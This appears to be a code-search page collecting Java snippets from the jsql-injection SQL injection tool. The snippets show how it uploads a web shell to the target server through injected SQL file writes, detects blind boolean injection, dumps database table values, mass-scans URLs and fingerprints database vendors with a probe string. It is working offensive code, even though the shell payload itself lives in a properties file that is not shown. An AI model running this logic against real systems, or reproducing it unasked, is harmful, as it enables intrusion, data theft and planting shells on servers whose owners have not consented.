Search in sources :

Example 16 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class ResourceAccess method uploadFile.

/**
 * Upload a file to the server.
 * @param pathFile Remote path of the file to upload
 * @param urlFile URL of uploaded file
 * @param file File to upload
 * @throws JSqlException
 * @throws IOException
 * @throws InterruptedException
 * @throws URISyntaxException
 */
public void uploadFile(String pathFile, String urlFile, File file) throws JSqlException, IOException, InterruptedException {
    if (!this.isReadingAllowed()) {
        return;
    }
    String sourceShellToInject = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload")).replace(DataAccess.SHELL_LEAD, DataAccess.LEAD);
    String pathShellFixed = pathFile;
    if (!pathShellFixed.matches(".*/$")) {
        pathShellFixed += "/";
    }
    this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile("<" + DataAccess.LEAD + ">" + sourceShellToInject + "<" + DataAccess.TRAIL + ">", pathShellFixed + this.filenameUpload), "upload");
    var sourcePage = new String[] { StringUtils.EMPTY };
    String sourceShellInjected;
    try {
        sourceShellInjected = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(pathShellFixed + this.filenameUpload), sourcePage, false, 1, null, "upload");
        if (StringUtils.isEmpty(sourceShellInjected)) {
            throw new JSqlException("Bad payload integrity: Empty payload");
        }
    } catch (JSqlException e) {
        throw this.getIntegrityError(sourcePage);
    }
    String urlFileFixed = urlFile;
    if (StringUtils.isEmpty(urlFileFixed)) {
        urlFileFixed = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(0, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf('/') + 1);
    }
    if (sourceShellInjected.indexOf(sourceShellToInject) > -1) {
        String logUrlFileFixed = urlFileFixed;
        String logPathShellFixed = pathShellFixed;
        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Upload payload deployed at '{}{}' in '{}{}'", () -> logUrlFileFixed, () -> this.filenameUpload, () -> logPathShellFixed, () -> this.filenameUpload);
        try (InputStream streamToUpload = new FileInputStream(file)) {
            HttpResponse<String> result = this.upload(file, urlFileFixed + "/" + this.filenameUpload, streamToUpload);
            this.confirmUpload(file, pathShellFixed, urlFileFixed, result);
        }
    } else {
        throw this.getIntegrityError(sourcePage);
    }
    var request = new Request();
    request.setMessage(Interaction.END_UPLOAD);
    this.injectionModel.sendToViews(request);
}
Also used : JSqlException(com.jsql.model.exception.JSqlException) SuspendableGetRows(com.jsql.model.suspendable.SuspendableGetRows) FileInputStream(java.io.FileInputStream) InputStream(java.io.InputStream) HttpRequest(java.net.http.HttpRequest) Request(com.jsql.model.bean.util.Request) FileInputStream(java.io.FileInputStream)

Example 17 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class StrategyInjectionBlind method checkApplicability.

@Override
public void checkApplicability() throws StoppedByUserSlidingException {
    if (StringUtils.isEmpty(this.injectionModel.getMediatorVendor().getVendor().instance().sqlBooleanBlind())) {
        LOGGER.log(LogLevel.CONSOLE_INFORM, "No Blind strategy known for {}", this.injectionModel.getMediatorVendor().getVendor());
    } else {
        LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with AND...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
        this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.AND);
        this.isApplicable = this.injectionBlind.isInjectable();
        if (!this.isApplicable) {
            LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with OR...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
            this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.OR);
            this.isApplicable = this.injectionBlind.isInjectable();
            if (this.isApplicable) {
                LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with OR", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
            }
        } else {
            LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with AND", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
        }
        if (this.isApplicable) {
            this.allow();
            var requestMessageBinary = new Request();
            requestMessageBinary.setMessage(Interaction.MESSAGE_BINARY);
            requestMessageBinary.setParameters(this.injectionBlind.getInfoMessage());
            this.injectionModel.sendToViews(requestMessageBinary);
        } else {
            this.unallow();
        }
    }
}
Also used : InjectionBlind(com.jsql.model.injection.strategy.blind.InjectionBlind) Request(com.jsql.model.bean.util.Request)

Example 18 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class DataAccess method listValues.

/**
 * Get table values and count each occurrences and send them to the view.<br>
 * Values are on clear text (not hexa) and follows this window pattern<br>
 * => hh[value 1]jj[count]hhgghh[value 2]jj[count]hhggh...hi<br>
 * Data window can be cut before the end of the request but the process helps to obtain
 * the rest of the unreachable data. The process can be interrupted by the user (stop/pause).
 * @param columns choice by the user
 * @return a 2x2 table containing values by columns
 * @throws JSqlException when injection failure or stopped by user
 */
public String[][] listValues(List<Column> columns) throws JSqlException {
    var database = (Database) columns.get(0).getParent().getParent();
    var table = (Table) columns.get(0).getParent();
    int rowCount = columns.get(0).getParent().getChildCount();
    // Inform the view that table has just been used
    var request = new Request();
    request.setMessage(Interaction.START_PROGRESS);
    request.setParameters(table);
    this.injectionModel.sendToViews(request);
    // Build an array of column names
    List<String> columnsName = new ArrayList<>();
    for (AbstractElementDatabase e : columns) {
        columnsName.add(e.toString());
    }
    // From that array, build the SQL fields nicely
    // => col1{%}col2...
    // ==> trim(ifnull(`col1`,0x00)),0x7f,trim(ifnull(`Col2`,0x00))...
    String[] arrayColumns = columnsName.toArray(new String[columnsName.size()]);
    List<List<String>> listValues = this.getRows(database, table, rowCount, arrayColumns);
    // Add the default title to the columns: row number, occurrence
    columnsName.add(0, StringUtils.EMPTY);
    columnsName.add(0, StringUtils.EMPTY);
    String[][] tableDatas = this.build2D(columnsName, listValues);
    arrayColumns = columnsName.toArray(new String[columnsName.size()]);
    // Group the columns names, values and Table object in one array
    var objectData = new Object[] { arrayColumns, tableDatas, table };
    var requestCreateValuesTab = new Request();
    requestCreateValuesTab.setMessage(Interaction.CREATE_VALUES_TAB);
    requestCreateValuesTab.setParameters(objectData);
    this.injectionModel.sendToViews(requestCreateValuesTab);
    var requestEndProgress = new Request();
    requestEndProgress.setMessage(Interaction.END_PROGRESS);
    requestEndProgress.setParameters(table);
    this.injectionModel.sendToViews(requestEndProgress);
    return tableDatas;
}
Also used : Table(com.jsql.model.bean.database.Table) Request(com.jsql.model.bean.util.Request) ArrayList(java.util.ArrayList) AbstractElementDatabase(com.jsql.model.bean.database.AbstractElementDatabase) AbstractElementDatabase(com.jsql.model.bean.database.AbstractElementDatabase) Database(com.jsql.model.bean.database.Database) ArrayList(java.util.ArrayList) List(java.util.List)

Example 19 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class ManagerScan method scan.

/**
 * Start fast scan of URLs in sequence and display result.
 * Unplug any existing view and plug a console-like view in order to
 * respond appropriately to GUI message with simple text result instead of
 * build complex graphical components during the multi website injections.
 * At the end of the scan it plugs again the normal view.
 * @param urlsItemList contains a list of String URL
 */
public void scan(List<ItemList> urlsItemList) {
    // Erase everything in the view from a previous injection
    var requests = new Request();
    requests.setMessage(Interaction.RESET_INTERFACE);
    MediatorHelper.model().sendToViews(requests);
    // wait for ending of ongoing interaction between two injections
    try {
        Thread.sleep(500);
    } catch (InterruptedException e) {
        LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
        Thread.currentThread().interrupt();
    }
    // Display result only in console
    var requestUnsubscribe = new Request();
    requestUnsubscribe.setMessage(Interaction.UNSUBSCRIBE);
    MediatorHelper.model().sendToViews(requestUnsubscribe);
    MediatorHelper.model().subscribe(new ScanListTerminal());
    MediatorHelper.model().setIsScanning(true);
    MediatorHelper.model().getResourceAccess().setScanStopped(false);
    for (ItemList urlItemList : urlsItemList) {
        var urlItemListScan = (ItemListScan) urlItemList;
        if (MediatorHelper.model().isStoppedByUser() || MediatorHelper.model().getResourceAccess().isScanStopped()) {
            break;
        }
        LOGGER.log(LogLevel.CONSOLE_INFORM, "Scanning {}", urlItemListScan.getBeanInjection().getUrl());
        MediatorHelper.model().getMediatorUtils().getParameterUtil().controlInput(urlItemListScan.getBeanInjection().getUrl(), urlItemListScan.getBeanInjection().getRequest(), urlItemListScan.getBeanInjection().getHeader(), urlItemListScan.getBeanInjection().getMethodInstance(), urlItemListScan.getBeanInjection().getRequestType(), true);
        try {
            Thread.sleep(500);
        } catch (InterruptedException e) {
            LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
            Thread.currentThread().interrupt();
        }
    }
    // Get back the normal view
    MediatorHelper.model().sendToViews(requestUnsubscribe);
    MediatorHelper.model().subscribe(MediatorHelper.frame().getSubscriber());
    MediatorHelper.model().setIsScanning(false);
    MediatorHelper.model().setIsStoppedByUser(false);
    MediatorHelper.model().getResourceAccess().setScanStopped(false);
    var request = new Request();
    request.setMessage(Interaction.END_SCAN);
    MediatorHelper.model().sendToViews(request);
}
Also used : ScanListTerminal(com.jsql.view.scan.ScanListTerminal) ItemList(com.jsql.view.swing.list.ItemList) Request(com.jsql.model.bean.util.Request) ItemListScan(com.jsql.view.swing.list.ItemListScan)

Example 20 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class MediatorVendor method fingerprintVendor.

public Vendor fingerprintVendor() {
    Vendor vendorFound = null;
    if (this.injectionModel.getMediatorVendor().getVendorByUser() != this.injectionModel.getMediatorVendor().getAuto()) {
        vendorFound = this.injectionModel.getMediatorVendor().getVendorByUser();
        LOGGER.log(LogLevel.CONSOLE_INFORM, MediatorVendor.LOG_VENDOR, () -> I18nUtil.valueByKey("LOG_DATABASE_TYPE_FORCED_BY_USER"), () -> this.injectionModel.getMediatorVendor().getVendorByUser());
    } else {
        LOGGER.log(LogLevel.CONSOLE_DEFAULT, "Fingerprinting database...");
        var insertionCharacter = "'\"#-)'\"*";
        String pageSource = this.injectionModel.injectWithoutIndex(insertionCharacter, "test#vendor");
        var mediatorVendor = this.injectionModel.getMediatorVendor();
        Vendor[] vendorsWithoutAuto = mediatorVendor.getVendors().stream().filter(v -> v != mediatorVendor.getAuto()).toArray(Vendor[]::new);
        // Test each vendor
        for (Vendor vendorTest : vendorsWithoutAuto) {
            if (pageSource.matches("(?si)" + vendorTest.instance().fingerprintErrorsAsRegex())) {
                vendorFound = vendorTest;
                LOGGER.log(LogLevel.CONSOLE_SUCCESS, MediatorVendor.LOG_VENDOR, () -> "Basic fingerprint matching vendor", () -> vendorTest);
                break;
            }
        }
        vendorFound = this.initializeVendor(vendorFound);
    }
    var requestSetVendor = new Request();
    requestSetVendor.setMessage(Interaction.SET_VENDOR);
    requestSetVendor.setParameters(vendorFound);
    this.injectionModel.sendToViews(requestSetVendor);
    return vendorFound;
}
Also used : Arrays(java.util.Arrays) VendorYaml(com.jsql.model.injection.vendor.model.VendorYaml) EnumMap(java.util.EnumMap) StringUtils(org.apache.commons.lang3.StringUtils) Header(com.jsql.model.bean.util.Header) Interaction(com.jsql.model.bean.util.Interaction) List(java.util.List) Logger(org.apache.logging.log4j.Logger) Request(com.jsql.model.bean.util.Request) Map(java.util.Map) LogLevel(com.jsql.util.LogLevel) Vendor(com.jsql.model.injection.vendor.model.Vendor) I18nUtil(com.jsql.util.I18nUtil) LogManager(org.apache.logging.log4j.LogManager) InjectionModel(com.jsql.model.InjectionModel) Request(com.jsql.model.bean.util.Request) Vendor(com.jsql.model.injection.vendor.model.Vendor)

Aggregations

Request (com.jsql.model.bean.util.Request)47 ArrayList (java.util.ArrayList)13 Header (com.jsql.model.bean.util.Header)12 EnumMap (java.util.EnumMap)12 ExecutorCompletionService (java.util.concurrent.ExecutorCompletionService)11 ExecutorService (java.util.concurrent.ExecutorService)11 JSqlException (com.jsql.model.exception.JSqlException)10 SuspendableGetRows (com.jsql.model.suspendable.SuspendableGetRows)9 IOException (java.io.IOException)9 ThreadFactoryCallable (com.jsql.model.suspendable.callable.ThreadFactoryCallable)8 ExecutionException (java.util.concurrent.ExecutionException)8 InjectionFailureException (com.jsql.model.exception.InjectionFailureException)7 ItemList (com.jsql.view.swing.list.ItemList)7 MalformedURLException (java.net.MalformedURLException)6 HttpRequest (java.net.http.HttpRequest)6 URL (java.net.URL)5 List (java.util.List)5 Matcher (java.util.regex.Matcher)5 IgnoreMessageException (com.jsql.model.exception.IgnoreMessageException)4 StoppedByUserSlidingException (com.jsql.model.exception.StoppedByUserSlidingException)4